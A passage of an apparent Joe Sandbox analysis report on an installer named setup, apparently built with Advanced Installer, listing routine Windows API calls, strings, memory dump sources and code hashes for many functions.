                                                                                                                                                                              • Instruction Fuzzy Hash: B151B571A00345EFDB10DF59DD05BAABBF4FB89B14F10825AF904B7290D7B2A814CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CAA4E0
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • GetProcAddress.KERNEL32(SetWindowTheme), ref: 00CAA51D
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CAA534
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                                • Part of subcall function 00C889F0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionDirectoryProcSystemVariableWake
                                                                                                                                                                              • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                                                                                              • API String ID: 2009665995-3123591815
                                                                                                                                                                              • Opcode ID: fb6f1d59c952b66f73c1d30b04ddbd902f95c09323b19647194b4c3313482f30
                                                                                                                                                                              • Instruction ID: 862a1961dee5bccd45f906ecf0298b351845c1b325880f2fa72a04d255f31977
                                                                                                                                                                              • Opcode Fuzzy Hash: fb6f1d59c952b66f73c1d30b04ddbd902f95c09323b19647194b4c3313482f30
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B21C172A41705EFCB20DF19ED06B59B760EB1BB30F144215E460B72D0DBB0BA08CB66
                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00D99A60,0000000D,00BB079C,00000001,00000000,0000000B,?,00D99CCA,00000021,FlsSetValue,00E10E8C,00E10E94,00000001), ref: 00D99A14
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcmpW.KERNEL32(?,#32770), ref: 00BB8DA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcmp
                                                                                                                                                                              • String ID: #32770
                                                                                                                                                                              • API String ID: 1534048567-463685578
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF37A
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF39C
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF3C4
                                                                                                                                                                              • __Getctype.LIBCPMT ref: 00BDF4A5
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00BDF507
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF531
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1102183713-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF16D
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF18F
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF1B7
                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00BDF281
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00BDF2C6
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF2FE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1184649410-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00C7BBD5
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00C7BCA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: AI_FRAME_NO_CAPTION_$Dialog$`Dialog` = '
                                                                                                                                                                              • API String ID: 1385522511-2270296660
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00D819CA,00D81996,?,?,00BDC5ED,00CCA740,?,00000008), ref: 00D819E1
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D819EF
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D81A08
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00D819CA,00D81996,?,?,00BDC5ED,00CCA740,?,00000008), ref: 00D81A5A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CCD5E7
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CCD603
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,00DEC257), ref: 00CCD614
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CCD622
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                                                                              • String ID: <
                                                                                                                                                                              • API String ID: 2321548817-4251816714
                                                                                                                                                                              • Opcode ID: 22cd5b13df965d9441a814324c0f79945c6076994f73a03babe4773f11d298ce
                                                                                                                                                                              • Instruction ID: 7a4664adff44436ecd280edf3a77af4b7cd417cd649dc9c9d44bd9831990049c
                                                                                                                                                                              • Opcode Fuzzy Hash: 22cd5b13df965d9441a814324c0f79945c6076994f73a03babe4773f11d298ce
                                                                                                                                                                              • Instruction Fuzzy Hash: D4616AB1D006499FDB10CFA9C844B9EBBB4FF49324F14826DE826AB391D7759E44CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAF96B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF9B4
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAFA02
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: .dll$DllGetActivationFactory
                                                                                                                                                                              • API String ID: 145871493-1250754257
                                                                                                                                                                              • Opcode ID: 2c7c322545c27fdfd145e46aedc29a45c446b3d5c7335f2d74fc209ee3a10ffd
                                                                                                                                                                              • Instruction ID: b902582a813f815405e5a649fd56e56b2c22eb6699b27c664b39acebf2be6c37
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c7c322545c27fdfd145e46aedc29a45c446b3d5c7335f2d74fc209ee3a10ffd
                                                                                                                                                                              • Instruction Fuzzy Hash: EE615D30D0820AEEDF14DFA8C895BFDB7F1EF15300F2481A9E415A7291EB749A45CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAF96B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF9B4
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAFA02
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: .dll$DllGetActivationFactory
                                                                                                                                                                              • API String ID: 145871493-1250754257
                                                                                                                                                                              • Opcode ID: 10ad0eb947153b09064dffe9335a08d3674c6e393394a8829c2b6621656c8fb9
                                                                                                                                                                              • Instruction ID: 05a4d00eca3899bc36a1d687f518ce20c759c06169d00350e32f45e74f318b05
                                                                                                                                                                              • Opcode Fuzzy Hash: 10ad0eb947153b09064dffe9335a08d3674c6e393394a8829c2b6621656c8fb9
                                                                                                                                                                              • Instruction Fuzzy Hash: CD414F30D0420AEEDF24DFA8C894AFEB7F1EF55300F2581A9D015A71A1EB74DA45CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,E5106CA8,E5106CA8,?,?,?,?,00DA82C0,000000FF), ref: 00CB6AF3
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00CB6B1C
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,00DA82C0,000000FF), ref: 00CB6B7C
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                              • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                                                                              • API String ID: 4190037839-2994018265
                                                                                                                                                                              • Opcode ID: ad5e5e4a1d5982207da7c0792305d734f40d75811c291323793eb08f82a81682
                                                                                                                                                                              • Instruction ID: f090594386b7de1b0776b7878d8da3e0af42ce0e3a55a7d113e1a158c9c89312
                                                                                                                                                                              • Opcode Fuzzy Hash: ad5e5e4a1d5982207da7c0792305d734f40d75811c291323793eb08f82a81682
                                                                                                                                                                              • Instruction Fuzzy Hash: B0318E72744205AFEB248F45DC45FEABBB8FB08750F10412AF915E7280E779A904DAA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(ComCtl32.dll,E5106CA8,?,00000007,00000007), ref: 00CCF15E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCF181
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00CCF1FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                                                                                              • API String ID: 145871493-764666640
                                                                                                                                                                              • Opcode ID: 47d71e4d4a282453aa86fcb735ad9c035639e7b24bcbe8b1ba55f1fb29fad3d0
                                                                                                                                                                              • Instruction ID: 438acd16002b8f76743fb5b3025aeb98f5524fd342a156c57344fd51a57c872d
                                                                                                                                                                              • Opcode Fuzzy Hash: 47d71e4d4a282453aa86fcb735ad9c035639e7b24bcbe8b1ba55f1fb29fad3d0
                                                                                                                                                                              • Instruction Fuzzy Hash: 73314FB1A00259EFEB109F96DC44BAFBBF8EB48750F14422EE915E7290D7758A05CB90
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB2592
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB25DA
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BB2617
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionCreateDirectoryVariableWake
                                                                                                                                                                              • String ID: xi$xi
                                                                                                                                                                              • API String ID: 2312781895-3471652813
                                                                                                                                                                              • Opcode ID: c4facf971391dc0afbfc3231dad2f97d3183aa0394123aaada6929944470c673
                                                                                                                                                                              • Instruction ID: 1c6834281980615585c478b333adfbcd80a1b6222ef8a0d3c452310e938827c2
                                                                                                                                                                              • Opcode Fuzzy Hash: c4facf971391dc0afbfc3231dad2f97d3183aa0394123aaada6929944470c673
                                                                                                                                                                              • Instruction Fuzzy Hash: AE21A4719403099BC724EBA4DD0A7AE77B0EB9A720F1442A5E4627B2D1D7B06908C762
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E5106CA8,00000001,?,00000000,00E0A459,000000FF,?,00D8B4FC,?,?,00D8B4D0,00000016), ref: 00D8B5A1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D8B5B3
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00E0A459,000000FF,?,00D8B4FC,?,?,00D8B4D0,00000016), ref: 00D8B5D5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              APIs
                                                                                                                                                                              • SleepConditionVariableCS.KERNELBASE(?,00D80285,00000064), ref: 00D8030B
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF), ref: 00D80315
                                                                                                                                                                              • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF), ref: 00D80326
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00E9FF6C,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177), ref: 00D8032D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3269011525-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00CC5074
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00CC5096
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC50BE
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00CC51A7
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC51D1
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 459529453-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BB0B6A
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BB0B70
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00BB0B93
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00DA9C66,000000FF), ref: 00BB0BBB
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00DA9C66,000000FF), ref: 00BB0BC1
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$FreeProcess$FormatMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1606019998-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?), ref: 00BAD501
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00BAD51E
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BAD528
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BAD53F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 590199018-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(*.*,?,?,?,E5106CA8,?), ref: 00BC28B5
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path
                                                                                                                                                                              • String ID: *.*$\\?\$\\?\UNC\
                                                                                                                                                                              • API String ID: 2875597873-1700010636
                                                                                                                                                                              • Opcode ID: fedeeca82e03099af3fe4ef875e145c21761316a53e7ca10b6c1b5c779bc7a65
                                                                                                                                                                              • Instruction ID: adf04f4d7f162259ea93ee6e5c2f48cb5dabde90177ebdb02fbd6d426c60c9f1
                                                                                                                                                                              • Opcode Fuzzy Hash: fedeeca82e03099af3fe4ef875e145c21761316a53e7ca10b6c1b5c779bc7a65
                                                                                                                                                                              • Instruction Fuzzy Hash: C6710171A006099BDB10DF68C849FAAF3FAFF54724F1482ADE415DB291DBB69D40CB90
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DEF97F,000000FF), ref: 00CFFE23
                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DEF97F,000000FF), ref: 00CFFEB1
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                                                                              • String ID: << Advanced Installer (x86) Log >>$Ls
                                                                                                                                                                              • API String ID: 3699736680-2779674016
                                                                                                                                                                              • Opcode ID: 53e209f69c6bb3e8a9ad2073df762772b7ac891fd3141fd92769f17eb2d06395
                                                                                                                                                                              • Instruction ID: b9117a990c5176b64992560f41a487dd0f47bd634e48dcdbdbe03240e5de4363
                                                                                                                                                                              • Opcode Fuzzy Hash: 53e209f69c6bb3e8a9ad2073df762772b7ac891fd3141fd92769f17eb2d06395
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B61D070905645DFD700CF69C94879ABBF4FF8A314F1882ADD510EB791DB74AA08CB91
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,E5106CA8,?,6CCF37E0,?), ref: 00D1F6B2
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000,?,?,0000C800), ref: 00D1F748
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,0000C800), ref: 00D1F7BC
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                              • String ID: Ls
                                                                                                                                                                              • API String ID: 1065093856-1452845052
                                                                                                                                                                              • Opcode ID: f7465765554db767f5dfbc8682f25896b4170d3fdcae041e5ceaa1574882b159
                                                                                                                                                                              • Instruction ID: 9c4792000a36b0af38d052b6e8c4e78be67595000418ef1a9aa8a2acca48892c
                                                                                                                                                                              • Opcode Fuzzy Hash: f7465765554db767f5dfbc8682f25896b4170d3fdcae041e5ceaa1574882b159
                                                                                                                                                                              • Instruction Fuzzy Hash: D0515A71900208AFDF14DFA5DD45BEEBBB9FF48314F24826AE400B7290DB755A44CB64
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000020), ref: 00BD518B
                                                                                                                                                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00BD51C8
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpyn
                                                                                                                                                                              • String ID: ?$t
                                                                                                                                                                              • API String ID: 97706510-1995845436
                                                                                                                                                                              • Opcode ID: 7e52e2ac57f4017331c4730188245344d3b75ba02a84055ca25d85991dcbf538
                                                                                                                                                                              • Instruction ID: a210eb1e1684683b4dc2c1b2700301ff3bd663ae7a086e502c4cfd5246f2fe56
                                                                                                                                                                              • Opcode Fuzzy Hash: 7e52e2ac57f4017331c4730188245344d3b75ba02a84055ca25d85991dcbf538
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F514C71508740AFE721DF61DC49B9BBBE8EB48701F00492EF699E6291E774A508CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException,?,?,?,?,00DA9680,000000FF), ref: 00BB0F32
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BB0F38
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RoOriginateLanguageException$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-3996158991
                                                                                                                                                                              • Opcode ID: bb0046b01194f45989ad11c66adb1cb23633d454a228b8b44353d6b6dc9d5ae8
                                                                                                                                                                              • Instruction ID: 4e8fd1e35b9bd316a1986826290dd36403ea9051864cc1cb0d95b6b3b8491259
                                                                                                                                                                              • Opcode Fuzzy Hash: bb0046b01194f45989ad11c66adb1cb23633d454a228b8b44353d6b6dc9d5ae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B315071914209DFDB20EFA8C855BFEB7F4EB15310F104A69E825B32D1DBB49A44CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C), ref: 00BB9E0C
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BB9E20
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9E5F
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 2351996187-3261393531
                                                                                                                                                                              • Opcode ID: e39c3967ef695b664d224470de08bd193ce0a7cd2e4771a9ec7190588b8cae54
                                                                                                                                                                              • Instruction ID: 8f1636963db1126f160c2bd3395035903c06df1da83634ede9dec6e5dda58cfd
                                                                                                                                                                              • Opcode Fuzzy Hash: e39c3967ef695b664d224470de08bd193ce0a7cd2e4771a9ec7190588b8cae54
                                                                                                                                                                              • Instruction Fuzzy Hash: CE11B231A05244DFCB20CF69D80476ABBE4EB9AB20F14879ED915A7390D7B1A808C790
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D84AAD,?,?,00000000,?,?,?,00D84BD7,00000002,FlsGetValue,00E0DF18,FlsGetValue), ref: 00D84B09
                                                                                                                                                                              • GetLastError.KERNEL32(?,00D84AAD,?,?,00000000,?,?,?,00D84BD7,00000002,FlsGetValue,00E0DF18,FlsGetValue,?,?,00D819F4), ref: 00D84B13
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D84B3B
                                                                                                                                                                              Strings
